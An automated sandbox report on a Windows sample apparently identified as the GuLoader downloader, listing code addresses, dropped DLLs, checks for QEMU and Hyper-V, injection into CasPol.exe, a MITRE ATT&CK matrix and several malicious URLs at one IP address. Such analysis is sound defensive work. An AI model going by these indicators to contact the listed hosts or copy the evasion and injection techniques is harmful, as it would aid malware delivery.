          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00404A21
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B1A98
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A314A8
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A320AE
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32897
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3189B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A310F6
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A324DB
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32C37
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3143B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31800
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32018
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31C75
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32441
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32DA2
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31D82
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3198B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3318B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3218A
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A321E8
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A319F6
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A315D0
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32D30
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3153A
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32909
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31D0C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3191C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3211C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3296F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3116E
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32552
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31AA9
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A316B3
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30E92
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32E97
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3269B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30E9A
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A326FB
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A312DA
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32A20
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3162C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3123F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32A08
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32E1D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3261D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32260
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31E6F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30E44
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31A4D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A323B2
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3178C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32B94
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31BE1
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32FDA
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31336
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32F3F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3233C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32B01
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31B0F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31718
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31B71
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631C75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632441
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632C37
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063143B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631800
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632018
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006310F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006324DB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006314A8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006320AE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632897
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063189B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063296F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063116E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632552
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632D30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063153A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632909
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D0C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063191C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063211C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006321E8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006319F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006315D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632DA2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D82
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063198B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063318B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063218A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632260
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631E6F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E44
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631A4D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A20
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063162C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063123F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A08
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E1D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063261D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006326FB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006312DA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631AA9
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006316B3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E92
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E97
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063269B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B71
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631336
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632F3F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063233C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632B01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B0F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631718
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631BE1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632FDA
          Source: lang-1032.dll.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
          Source: lang-1032.dll.2.drStatic PE information: No import functions for PE file found
          Source: C:\Users\user\Desktop\download.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
          Source: download.exeStatic PE information: invalid certificate
          Source: C:\Users\user\Desktop\download.exeFile read: C:\Users\user\Desktop\download.exeJump to behavior
          Source: download.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\download.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\download.exe C:\Users\user\Desktop\download.exe
          Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
          Source: C:\Users\user\Desktop\download.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Users\user\AppData\Local\Temp\nsp21EF.tmpJump to behavior
          Source: classification engineClassification label: mal76.troj.evad.winEXE@4/5@0/1
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\download.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004044AE GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:304:WilStaging_02
          Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: download.exe PID: 8540, type: MEMORYSTR
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B2F20 push eax; ret
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A314A8 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A320AE push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A388BE push esp; ret
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32897 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3189B push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30C99 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3449E push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3349D push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A340E2 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A340E6 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A394EB push esp; ret
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A310F6 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30CFC push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A33CCE push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A324DB push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A364DC pushfd ; ret
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32C37 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3143B push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A33C02 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31800 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3440B push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3341B push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32018 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3641D push 7E114A25h; iretd
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A34076 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31C75 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A33878 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32441 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A36C50 pushfd ; ret
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A335A3 push es; retf
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dllJump to dropped file
          Source: C:\Users\user\Desktop\download.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\download.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\download.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE3
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXELE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 928Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\download.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dllJump to dropped file
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00405745 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004026FE FindFirstFileA,
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00406280 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\download.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\download.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5897618619.0000000003F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe3
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exele
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00403B48 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongA,SendMessageA,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageA,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\download.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 630000
          Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Masquerading          		OS Credential Dumping21
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
          Process Injection          		11
          Virtualization/Sandbox Evasion          		LSASS Memory11
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading          		1
          Access Token Manipulation          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
          Process Injection          		NTDS3
          System Information Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.download.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          2.0.download.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://37.139.128.83/2-2100%Avira URL Cloudmalware
          http://37.139.128.83/2k100%Avira URL Cloudmalware
          http://37.139.128.83/2100%Avira URL Cloudmalware
          http://37.139.128.83/2Data100%Avira URL Cloudmalware
